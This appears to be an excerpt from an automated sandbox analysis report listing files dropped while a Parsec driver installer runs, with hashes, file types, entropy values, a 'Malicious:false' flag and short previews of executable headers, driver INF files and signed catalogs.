                            SHA1:A5EEDE1F86B4DBF8EB920FA4B74C03FFAA19847C
                            SHA-256:2379C89382789238DCAE1433C04EEB861A2AB72955EC67D7554F4889AF2788C3
                            SHA-512:ACAB6898ADB05CFD15A60B5248AD4E4C4763EB30BF32A872FE05E2FE29D663E37B7DFC812A5AA66D300AFF3178F045F10A3EA4231DD6B41BFC8BBDFDC6E7C3F4
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):67072
                            Entropy (8bit):6.314142155382167
                            Encrypted:false
                            SSDEEP:1536:St/KlpLMTc3WRyIdA2rS7D4NrOI4wlzgB5VdtXgDF3:NLMo3WRyIiwI4kggB5VdtXgDF
                            MD5:0195F2ACF32E1ECDC5AF0E3CF5184373
                            SHA1:993CD3216F983B6D1711CCE77976C71E1B7D6F9E
                            SHA-256:51B3F3BA1A7ABD58BED2C9E9EF67C39592FE585699EFBFE157308AF86F6930CC
                            SHA-512:E922C14E20072993B67DDE391F821E2E58C52D58AE7B194BB999B97C33637FF44597D005ED8E54495D87A4977E3954F00AD07971840115FF9E9343562BB98812
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):78336
                            Entropy (8bit):6.371751508872591
                            Encrypted:false
                            SSDEEP:1536:UbDMdx4Tm9lSD2HAcOqa57xlYuNxo8b1E:+MduTm9lSD7rNKk6
                            MD5:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                            SHA1:CD2F50FD5A7BD6291DE1948F100415044C767E63
                            SHA-256:3C928B9AFF2E651AA35EA798C29FDE398E9F7817E3451AE0F4C97C86630DC92B
                            SHA-512:84398D4E5680C2EA1679D0076468207A9503B053A233932FD3EFAEFDBF4559CFEAB5A0E95F526644C6382A88C17B6A62D3993323012211AB685DA4C4B025C045
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):4.139121993350808
                            Encrypted:false
                            SSDEEP:48:yZ/5Q4Ja0Y+0IeaRiCn5yXHUhQqSA6AqzrtEIZWXoXuV25WwHg:ohJr0IeQ5yXuQhrmEWYQmWw
                            MD5:E32319E5947A76F8E50EC50C37906882
                            SHA1:135A1ED2ADD1E8DDFF0920DF82E57078CA3CBD06
                            SHA-256:2A900AC21B85E6E32A502F24B804D8796A0D148B513D449AB4384323846D7DA9
                            SHA-512:5DEFF824DC784CDD44AE7C76B53EB9D212D1D9D2199F23D766325A2702180963BF52C40C6CC095C1F1584B2918DC9A7F4EEA7320904CAD147B48CD0A7F7584C0
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):37376
                            Entropy (8bit):5.313827090823637
                            Encrypted:false
                            SSDEEP:768:hpT8dTrLIdc5DGhZgItQwWgGjG1al2YjZ/2:hpAdTrLIdc5DGhZgItTXGcaLjZ/2
                            MD5:2422934B02194D962E3891D91DFF50C8
                            SHA1:7E00DF40C44ABC1077424CAF084494507FFF726F
                            SHA-256:313B1EB5A6DE86E234FCB18A6AA4AE75FFECB9243BDEC7F34253A7FCC9F29FC0
                            SHA-512:6E1F4C7CFA87A4576A5F943AF5B84B9BEADE8FFEA36CB94A03461F338C36C6647D074DBA4B5E160D75018762E5448A193FE59E0D2662DC6FCD24FEDAB45AC256
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1831424
                            Entropy (8bit):6.562960863651942
                            Encrypted:false
                            SSDEEP:49152:wORUHXxYF3icgea4Zb8nlJq22qT1MTrQyEDAxq4:FR+XxYxhgvc2Dq22gmrNi
                            MD5:61393B3920D949B7A89D8D8623A65BD8
                            SHA1:539EF7897C1A642BAA9353E3B630D35DFC642F5F
                            SHA-256:C70DA787D2857BB08A49327CE75299B6440A75E70BEABC8EFDC4084B779454CE
                            SHA-512:870AD9D39053A6A833A8ECD6F94691CD68839A4C47444D46EDEE0544D58C581D6D1CB821F181F2F9CFAB45C4AECA60CDF8D0D62128E6481319B81724DC4B048D
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):98816
                            Entropy (8bit):6.316378030753595
                            Encrypted:false
                            SSDEEP:3072:Q7Gh7ckvMmmAhgZhaHydiPuC0Z7corN/RBPe:Q7Ehg/aHcXCG7corBK
                            MD5:652C03D08A2ABB6ADC51F081B4FA078E
                            SHA1:C75D8762FBF44E97AF4B6C8B68E18977B35264E9
                            SHA-256:33ECC20387B077231AA28A3F13A33FAF030721360E74FD551D71BD26FC30E424
                            SHA-512:3EABA26C7D9B1A58CCD1AF0361E273DC2827D1CF2147A7889642CB3D93071885F7A83DFCD1555CF5C5694E8B61CC7BD9D52270024820050CCD1E5223758301C6
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................................................j............Rich............PE..L....T.............!.....(...Z......p........@......................................5.....@A........................P6..h...$R..........8 ...........................@..T............................................P.. ...`5.......................text....&.......(.................. ..`.data........@.......,..............@....idata.......P.......6..............@..@.didat.......p.......H..............@....rsrc...8 ......."...J..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x15b8 "Signature", at 0x68 WinDirPath, LanguageID 809, at 0x80 language en-GB
                            Category:dropped
                            Size (bytes):8660
                            Entropy (8bit):3.3733007089209863
                            Encrypted:false
                            SSDEEP:96:66BcwTdCMNyLNfWdlapY4VfOrtlBARv7Li+XT7+uZt/Y0BnuOTITdE7VGpR2bQjN:67wQMYBfeaOBA9LjXvZ1NnuT6u
                            MD5:A35E461187397BC21D7B1FFBC425EB69
                            SHA1:1F8AF576F211C42C237324A7C04D5BE9DA89C39C
                            SHA-256:0474A97D51D62B4FE7BCBAEFBDE58C25590C088CC25C93735126F98039C2C0D5
                            SHA-512:1F37125FBBDB18D5088409AA083840C9EEFF4B9318466E7B6B2F54245FBB6FB24497E31369A7A112BD0B7FF8592E4B0551CF3F30EA7D99F969B2CB135BF13CD4
                            Malicious:false
                            Preview:..........................x................$...............H...................h................!......C.:.\.W.i.n.d.o.w.s.....e.n.-.G.B...........................................................D...................................................................................................h...........................0...........|...........<...........t.......(.......................$...................................................................................................................................................................p...........P............................... .......................................|...|...........................................................|...........,...............................................................................................................................................$...................p...................@...................................................................................................
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Generic INItialization configuration [BeginLog]
                            Category:dropped
                            Size (bytes):86018
                            Entropy (8bit):5.1296240215603115
                            Encrypted:false
                            SSDEEP:768:Own95cdyYloiwTyz25Lns3aG0arPonyc4pny8:O+5cdyeoiwGeLns3aG0arPyyc4dy8
                            MD5:7823D862F0462754BF8F4FC141C10138
                            SHA1:BEB78B8026146E6EE750DA3E1705FAB3AD11B80B
                            SHA-256:2B7D2710BC63B489A8DEEA6456907B372EABFC94B4E13A771DC0F34EE1F95E6F
                            SHA-512:5BEDCE1023046EEF291F05E39C66E20B1CD407C566445C92BFB195CCB42B329CCBDC6166A041DB4EC05715D4B5544CA28153691F5871DF6110858DF9ADC057EF
                            Malicious:false
                            Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
